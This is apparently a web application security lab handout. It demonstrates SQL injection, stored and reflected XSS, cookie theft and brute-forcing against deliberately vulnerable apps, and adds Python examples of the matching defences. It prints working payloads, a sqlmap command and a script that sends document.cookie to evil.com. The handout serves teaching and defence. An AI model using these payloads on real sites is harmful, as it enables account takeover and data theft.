🔥 Web Application Security & Exploitation Lab
1️⃣ Setting Up the Lab
Install the Necessary Tools
- Burp Suite Community Edition → Download here
- OWASP ZAP → Download here
- SQLMap (command-line tool, install via pip):
pip install sqlmap
- Vulnerable Web Application (Choose One)
- DVWA (Damn Vulnerable Web App) → Install on a local VM (Apache + PHP).
- OWASP Juice Shop → Easy setup using Docker:
docker run -d -p 3000:3000 bkimminich/juice-shop
2️⃣ SQL Injection Attack
SQL Injection (SQLi) allows attackers to extract data from a database.
Step 1: Identify a Vulnerable Input Field
- Open Burp Suite and turn on Intercept Mode.
- Enter a username and password in a login form, then capture the request.
- Modify the request with a simple SQLi payload:
' OR '1'='1' --
- Forward the request and see if you get unauthorized access.
Step 2: Automate SQL Injection with SQLMap
Run SQLMap against a vulnerable parameter:
sqlmap -u "http://target.com/login.php?user=admin" --dbs
- This command will extract database names if the input is vulnerable.
3️⃣ Cross-Site Scripting (XSS) Attack
XSS attacks allow injecting JavaScript into vulnerable web pages.
Step 1: Find a Comment or Search Field
- In DVWA, go to the XSS (Stored) section.
- Submit this script as a comment:
<script>alert('Hacked!');</script>
- If vulnerable, every visitor will see the JavaScript alert box.
Step 2: Perform XSS via Burp Suite
- Capture a search request in Burp Suite.
- Modify the search query to inject:
<img src=x onerror=alert('XSS')>
- If the input isn’t sanitized, the JavaScript executes in the victim’s browser.
4️⃣ Authentication Bypass Attack
Many websites store session tokens in cookies, which can be stolen.
Step 1: Steal a User’s Cookie
- Inject this script into a comment field:
<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>
- The attacker receives the victim’s authentication cookie.
- Use the stolen cookie to log in as the victim.
Step 2: Test for Weak Authentication
- Try default credentials (e.g., admin:admin or root:password).
- If the site lacks rate limiting, use Burp Suite’s Intruder tool to brute-force login attempts.
🔐 Defensive Measures
After exploiting these vulnerabilities, we must understand how to prevent them.
✅ Preventing SQL Injection:
- Use prepared statements in SQL queries.
- Implement Web Application Firewalls (WAFs) to block malicious requests.
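The following is an added example (not part of the lab's own material) that puts the vulnerable login query beside its prepared-statement fix and runs both against a constructed in-memory SQLite table, using the payload from Step 1 of the SQL Injection section. The table, usernames and passwords are made up for the demonstration; real systems store password hashes, not plaintext.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'hunter2')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """'Before': user input is concatenated straight into the SQL text.
    A quote in the input ends the string literal and the rest of the input
    becomes SQL, which is what the lab's payload relies on."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """'After': a prepared statement with bound parameters. The values are
    passed to the driver separately from the query text, so a quote in the
    input is data and never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The payload from Step 1 of the SQL Injection section. Against the
# concatenated query it becomes:
#   ... WHERE username = '' OR '1'='1' --' AND password = '...'
# and the comment marker discards the password check entirely.
PAYLOAD = "' OR '1'='1' --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", login_vulnerable(conn, PAYLOAD, "anything"))
    print("parameterized:", login_parameterized(conn, PAYLOAD, "anything"))
    print("legit login  :", login_parameterized(conn, "alice", "hunter2"))
```

Run it and the concatenated version returns the first user in the table without a valid password, while the parameterized version returns nothing for the same input and still accepts a genuine username/password pair. The fix is the query shape, not input filtering: a WAF can miss an encoded variant, but a bound parameter cannot be parsed as SQL.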
✅ Preventing XSS Attacks:
- Always sanitize user inputs before storing them.
- Use Content Security Policy (CSP) to restrict script execution.
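As an added example (not from the lab or from DVWA), the block below renders a constructed list of comments two ways: dropped raw into the page, and HTML-encoded at render time so the browser treats the payloads from the XSS section as text rather than tags. It also builds a Content-Security-Policy header that forbids inline scripts; the policy sources are an assumption and should be adapted to the real deployment.

```python
import html

# Constructed sample comments: two benign entries and the two payloads shown
# in the XSS section of the lab.
SAMPLE_COMMENTS = [
    "Great post, thanks!",
    "<script>alert('Hacked!');</script>",
    "<img src=x onerror=alert('XSS')>",
    "Use 1 < 2 && 3 > 2 in your checks",
]


def render_comment_unsafe(comment):
    """'Before': raw user content is inserted into the page as markup."""
    return '<li class="comment">' + comment + "</li>"


def render_comment_safe(comment):
    """'After': encode <, >, &, and quotes as entities at render time, so the
    whole comment is displayed as text and no tag or handler is created."""
    return '<li class="comment">' + html.escape(comment, quote=True) + "</li>"


def render_page(comments, safe=True):
    render = render_comment_safe if safe else render_comment_unsafe
    return "<ul>" + "".join(render(c) for c in comments) + "</ul>"


def contains_raw_tag(rendered_body):
    """Crude check used only to contrast the two renderers: is a tag from
    user content still present as real markup in the output?"""
    return "<script" in rendered_body or "<img" in rendered_body


def csp_header():
    """Content-Security-Policy allowing scripts only from the site's own
    origin. Without 'unsafe-inline', an injected <script> block or an
    onerror= attribute does not execute even if encoding is missed somewhere.
    The source list here is an assumed starting point, not a universal policy."""
    policy = "; ".join([
        "default-src 'self'",
        "script-src 'self'",
        "object-src 'none'",
        "base-uri 'self'",
    ])
    return ("Content-Security-Policy", policy)


if __name__ == "__main__":
    print("unsafe:", render_page(SAMPLE_COMMENTS, safe=False))
    print("safe  :", render_page(SAMPLE_COMMENTS, safe=True))
    print("%s: %s" % csp_header())
```

Encoding on output complements the lab's advice to sanitize before storing: stored sanitization can be bypassed by a path that writes to the database without going through the filter, while output encoding applies at the one place the data meets the browser. CSP is the second layer for the cases where a template forgets to encode.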
✅ Preventing Authentication Attacks:
- Implement Multi-Factor Authentication (MFA).
- Store session tokens securely (HttpOnly & Secure cookie flags).
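The block below is an added example, not code from the lab, covering the two authentication defences at once: a Set-Cookie header for a session token with the HttpOnly, Secure and SameSite flags (HttpOnly is what stops the document.cookie exfiltration shown in Step 1 from reading the token), and a per-account failed-login counter with a lockout window, which is the rate limiting whose absence Step 2 says Intruder exploits. The lockout thresholds and the in-memory credential store are assumptions for the demonstration.

```python
import secrets
import time


def new_session_token():
    """Random, unguessable session identifier."""
    return secrets.token_urlsafe(32)


def session_cookie_header(token, max_age=3600):
    """Set-Cookie value for a session token. HttpOnly keeps JavaScript from
    reading it, Secure restricts it to HTTPS, and SameSite=Strict keeps it
    off cross-site requests."""
    return (
        f"session={token}; Path=/; Max-Age={max_age}; "
        "HttpOnly; Secure; SameSite=Strict"
    )


class LoginRateLimiter:
    """Per-account failed-attempt counter. Assumed policy: after
    `max_failures` failures within `window_seconds`, further attempts for
    that account are refused until the oldest failure falls out of the
    window. `clock` is injectable so the behaviour can be tested offline."""

    def __init__(self, max_failures=5, window_seconds=900, clock=time.time):
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock
        self._failures = {}  # username -> list of failure timestamps

    def _recent(self, username):
        cutoff = self.clock() - self.window
        recent = [t for t in self._failures.get(username, []) if t > cutoff]
        self._failures[username] = recent
        return recent

    def allowed(self, username):
        return len(self._recent(username)) < self.max_failures

    def record_failure(self, username):
        self._recent(username).append(self.clock())

    def record_success(self, username):
        self._failures.pop(username, None)


def attempt_login(limiter, store, username, password):
    """Constructed login check. `store` maps username -> password for the
    demo only; a real system compares password hashes. Returns 'locked',
    'ok' or 'denied'."""
    if not limiter.allowed(username):
        return "locked"
    expected = store.get(username, "")
    if expected and secrets.compare_digest(expected, password):
        limiter.record_success(username)
        return "ok"
    limiter.record_failure(username)
    return "denied"


if __name__ == "__main__":
    store = {"admin": "correct-horse-battery"}   # constructed credential
    limiter = LoginRateLimiter(max_failures=3, window_seconds=60)
    for guess in ("admin", "password", "admin123", "correct-horse-battery"):
        print(guess, "->", attempt_login(limiter, store, "admin", guess))
    print(session_cookie_header(new_session_token()))
```

The fourth attempt in the demo is refused even though the password is correct, because the account is in its lockout window; that is the behaviour that makes an Intruder wordlist run against the login form stop producing results after a handful of requests. Lock per account (and ideally also per source address) rather than globally, and log lockouts so the attempts show up in detection.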
📌 Conclusion
This lab teaches you real-world penetration testing skills for web application security. By completing this, you’ve learned:
✅ How attackers exploit SQL injection and XSS vulnerabilities.
✅ How to manipulate web requests using Burp Suite.
✅ How to steal session tokens and bypass authentication.
✅ How to defend against web-based attacks.
📤 Submission Instructions
- Submit screenshots or a detailed report explaining:
✅ How you exploited each vulnerability
✅ The impact of the attack
✅ Steps to mitigate the issue
🚀 Next Steps:
- Try testing real-world bug bounty challenges at Hack The Box or PortSwigger’s Web Security Academy.